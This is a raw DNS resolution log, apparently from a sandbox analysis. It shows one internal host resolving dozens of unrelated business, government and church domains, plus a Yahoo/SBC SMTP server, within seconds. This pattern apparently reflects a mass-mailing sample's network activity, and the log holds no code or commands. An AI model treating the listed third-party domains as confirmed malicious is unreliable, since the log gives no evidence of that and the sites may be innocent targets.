                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.742043018 CET8.8.8.8192.168.2.60xd2f2No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.750703096 CET8.8.8.8192.168.2.60xc112No error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.753081083 CET8.8.8.8192.168.2.60x917No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.810316086 CET8.8.8.8192.168.2.60x19c2No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.821157932 CET8.8.8.8192.168.2.60x246bNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.824080944 CET8.8.8.8192.168.2.60x7649No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.824080944 CET8.8.8.8192.168.2.60x7649No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.824080944 CET8.8.8.8192.168.2.60x7649No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.828289032 CET8.8.8.8192.168.2.60xa542No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.842607021 CET8.8.8.8192.168.2.60x9a3bNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.843266010 CET8.8.8.8192.168.2.60xb431No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.845185041 CET8.8.8.8192.168.2.60x9496No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.845185041 CET8.8.8.8192.168.2.60x9496No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.845185041 CET8.8.8.8192.168.2.60x9496No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.845185041 CET8.8.8.8192.168.2.60x9496No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.845185041 CET8.8.8.8192.168.2.60x9496No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.854935884 CET8.8.8.8192.168.2.60x5ae4No error (0)www.diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.856514931 CET8.8.8.8192.168.2.60x986eNo error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.856514931 CET8.8.8.8192.168.2.60x986eNo error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.880328894 CET8.8.8.8192.168.2.60x70cfNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.897949934 CET8.8.8.8192.168.2.60xd5cfNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.901309013 CET8.8.8.8192.168.2.60xfdbNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.905606031 CET8.8.8.8192.168.2.60xaf05No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.936469078 CET8.8.8.8192.168.2.60xa48cNo error (0)sanfotek.net97.74.42.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.955851078 CET8.8.8.8192.168.2.60x91bfNo error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.960761070 CET8.8.8.8192.168.2.60x3ec6No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.970727921 CET8.8.8.8192.168.2.60x3ba9No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.972995996 CET8.8.8.8192.168.2.60x9953No error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.978168964 CET8.8.8.8192.168.2.60x8b50No error (0)adventist.ro104.21.48.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.978168964 CET8.8.8.8192.168.2.60x8b50No error (0)adventist.ro172.67.183.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.979937077 CET8.8.8.8192.168.2.60xc87No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.979937077 CET8.8.8.8192.168.2.60xc87No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.982969046 CET8.8.8.8192.168.2.60x6741No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.983892918 CET8.8.8.8192.168.2.60xda65No error (0)cutchie.com199.59.243.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.988198042 CET8.8.8.8192.168.2.60xddebNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.989171982 CET8.8.8.8192.168.2.60x7fc0No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.995448112 CET8.8.8.8192.168.2.60x7848No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:14.995891094 CET8.8.8.8192.168.2.60x3841No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.018130064 CET8.8.8.8192.168.2.60x3025No error (0)aiolos-sa.gr188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.018130064 CET8.8.8.8192.168.2.60x3025No error (0)aiolos-sa.gr188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.044502974 CET8.8.8.8192.168.2.60xd467No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.049776077 CET8.8.8.8192.168.2.60x148fNo error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.049799919 CET8.8.8.8192.168.2.60xcba5No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.049799919 CET8.8.8.8192.168.2.60xcba5No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.081579924 CET8.8.8.8192.168.2.60x89eeNo error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.081579924 CET8.8.8.8192.168.2.60x89eeNo error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.095860004 CET8.8.8.8192.168.2.60xb833No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.098562002 CET8.8.8.8192.168.2.60xcde1No error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.098562002 CET8.8.8.8192.168.2.60xcde1No error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.105185032 CET8.8.8.8192.168.2.60x902eNo error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.115679026 CET8.8.8.8192.168.2.60xe91bName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.126178026 CET8.8.8.8192.168.2.60xf14dName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.126418114 CET8.8.8.8192.168.2.60x9d34No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.150948048 CET8.8.8.8192.168.2.60x1e72Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.166220903 CET8.8.8.8192.168.2.60xbd30No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.196367025 CET8.8.8.8192.168.2.60x841dNo error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.200624943 CET8.8.8.8192.168.2.60x8926No error (0)ldh.la.gov75.2.95.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.211242914 CET8.8.8.8192.168.2.60x42adNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.214704037 CET8.8.8.8192.168.2.60x3803No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.214704037 CET8.8.8.8192.168.2.60x3803No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.214704037 CET8.8.8.8192.168.2.60x3803No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.217758894 CET8.8.8.8192.168.2.60xf0bcName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.295950890 CET8.8.8.8192.168.2.60x65d9Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.297458887 CET8.8.8.8192.168.2.60xdc56No error (0)hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.297458887 CET8.8.8.8192.168.2.60xdc56No error (0)hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.304975986 CET8.8.8.8192.168.2.60x3a09No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.317753077 CET8.8.8.8192.168.2.60x71c5No error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.320614100 CET8.8.8.8192.168.2.60xc023No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.320614100 CET8.8.8.8192.168.2.60xc023No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.325431108 CET8.8.8.8192.168.2.60x4ed1No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.325431108 CET8.8.8.8192.168.2.60x4ed1No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.325431108 CET8.8.8.8192.168.2.60x4ed1No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.325839043 CET8.8.8.8192.168.2.60x984dServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.333163977 CET8.8.8.8192.168.2.60xd1f1No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.385723114 CET8.8.8.8192.168.2.60x2e3cNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.392822027 CET8.8.8.8192.168.2.60x8cb7No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.398629904 CET8.8.8.8192.168.2.60x6825Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.408670902 CET8.8.8.8192.168.2.60x636fNo error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.410271883 CET8.8.8.8192.168.2.60x4e2dNo error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.410271883 CET8.8.8.8192.168.2.60x4e2dNo error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.414777040 CET8.8.8.8192.168.2.60x5ff9No error (0)rkengg.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.414777040 CET8.8.8.8192.168.2.60x5ff9No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.414777040 CET8.8.8.8192.168.2.60x5ff9No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.414777040 CET8.8.8.8192.168.2.60x5ff9No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.424010992 CET8.8.8.8192.168.2.60x8f4cNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.425550938 CET8.8.8.8192.168.2.60x47a2No error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.433013916 CET8.8.8.8192.168.2.60x797fNo error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.433013916 CET8.8.8.8192.168.2.60x797fNo error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.433013916 CET8.8.8.8192.168.2.60x797fNo error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.433013916 CET8.8.8.8192.168.2.60x797fNo error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.434782982 CET8.8.8.8192.168.2.60xd021Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.461966038 CET8.8.8.8192.168.2.60x3bd8No error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.461966038 CET8.8.8.8192.168.2.60x3bd8No error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.472274065 CET8.8.8.8192.168.2.60xc594No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.497750044 CET8.8.8.8192.168.2.60x2676No error (0)www.diamir.de138.201.65.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.534713984 CET8.8.8.8192.168.2.60xaa6aNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.568701029 CET8.8.8.8192.168.2.60x3905No error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.569395065 CET8.8.8.8192.168.2.60x4955Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.603733063 CET8.8.8.8192.168.2.60xaa1bNo error (0)hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.603733063 CET8.8.8.8192.168.2.60xaa1bNo error (0)hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.604598045 CET8.8.8.8192.168.2.60x64a8No error (0)anduran.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.604598045 CET8.8.8.8192.168.2.60x64a8No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.604598045 CET8.8.8.8192.168.2.60x64a8No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.604598045 CET8.8.8.8192.168.2.60x64a8No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.607599974 CET8.8.8.8192.168.2.60x65dfServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.630430937 CET8.8.8.8192.168.2.60x9239No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.630430937 CET8.8.8.8192.168.2.60x9239No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.649975061 CET8.8.8.8192.168.2.60xacf6No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.653480053 CET8.8.8.8192.168.2.60x45eaName error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.666646957 CET8.8.8.8192.168.2.60x49b6No error (0)nblewis.com35.169.15.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.666646957 CET8.8.8.8192.168.2.60x49b6No error (0)nblewis.com52.0.29.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.666646957 CET8.8.8.8192.168.2.60x49b6No error (0)nblewis.com35.168.185.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.668595076 CET8.8.8.8192.168.2.60x5a4dNo error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.687055111 CET8.8.8.8192.168.2.60xe296No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.687114000 CET8.8.8.8192.168.2.60xe9d7No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.687114000 CET8.8.8.8192.168.2.60xe9d7No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.707102060 CET8.8.8.8192.168.2.60x8339No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.707140923 CET8.8.8.8192.168.2.60x1bbaNo error (0)anduran.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.707140923 CET8.8.8.8192.168.2.60x1bbaNo error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.707140923 CET8.8.8.8192.168.2.60x1bbaNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.707140923 CET8.8.8.8192.168.2.60x1bbaNo error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.737222910 CET8.8.8.8192.168.2.60xaed6No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.754925966 CET8.8.8.8192.168.2.60xf4aaNo error (0)plaske.ua52.211.245.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.755027056 CET8.8.8.8192.168.2.60x7d8Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.755044937 CET8.8.8.8192.168.2.60x7a80No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.760648966 CET8.8.8.8192.168.2.60xe226No error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.760648966 CET8.8.8.8192.168.2.60xe226No error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.762267113 CET8.8.8.8192.168.2.60x952bNo error (0)www.hyabmagneter.se172.67.209.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.762267113 CET8.8.8.8192.168.2.60x952bNo error (0)www.hyabmagneter.se104.21.69.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.780358076 CET8.8.8.8192.168.2.60xe226No error (0)hyab.se188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.780358076 CET8.8.8.8192.168.2.60xe226No error (0)hyab.se188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.783076048 CET8.8.8.8192.168.2.60x5e39Name error (3)haigh-me.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.821110010 CET8.8.8.8192.168.2.60x1bd4No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.837044001 CET8.8.8.8192.168.2.60x2011No error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.845968008 CET8.8.8.8192.168.2.60xc81aNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.845968008 CET8.8.8.8192.168.2.60xc81aNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.854055882 CET8.8.8.8192.168.2.60xf5ebNo error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.854912043 CET8.8.8.8192.168.2.60x5629No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.856020927 CET8.8.8.8192.168.2.60x4597No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.897010088 CET8.8.8.8192.168.2.60xe90cName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.908438921 CET8.8.8.8192.168.2.60x65dfServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.940412998 CET8.8.8.8192.168.2.60xdc83No error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.940412998 CET8.8.8.8192.168.2.60xdc83No error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.944222927 CET8.8.8.8192.168.2.60x410bNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.984186888 CET8.8.8.8192.168.2.60x5f87No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.984186888 CET8.8.8.8192.168.2.60x5f87No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:15.992635012 CET8.8.8.8192.168.2.60x773cNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.036297083 CET8.8.8.8192.168.2.60x328cServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.056427956 CET8.8.8.8192.168.2.60xe76aNo error (0)sjbmw.com198.199.101.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.056740999 CET8.8.8.8192.168.2.60x1b0aNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.101484060 CET8.8.8.8192.168.2.60xb2c6Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.102437973 CET8.8.8.8192.168.2.60xa35cNo error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.102437973 CET8.8.8.8192.168.2.60xa35cNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.102437973 CET8.8.8.8192.168.2.60xa35cNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.106816053 CET8.8.8.8192.168.2.60xbec8No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.109045982 CET8.8.8.8192.168.2.60x21a1No error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.127494097 CET8.8.8.8192.168.2.60xcaf1No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.127494097 CET8.8.8.8192.168.2.60xcaf1No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:16.127494097 CET8.8.8.8192.168.2.60xcaf1No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
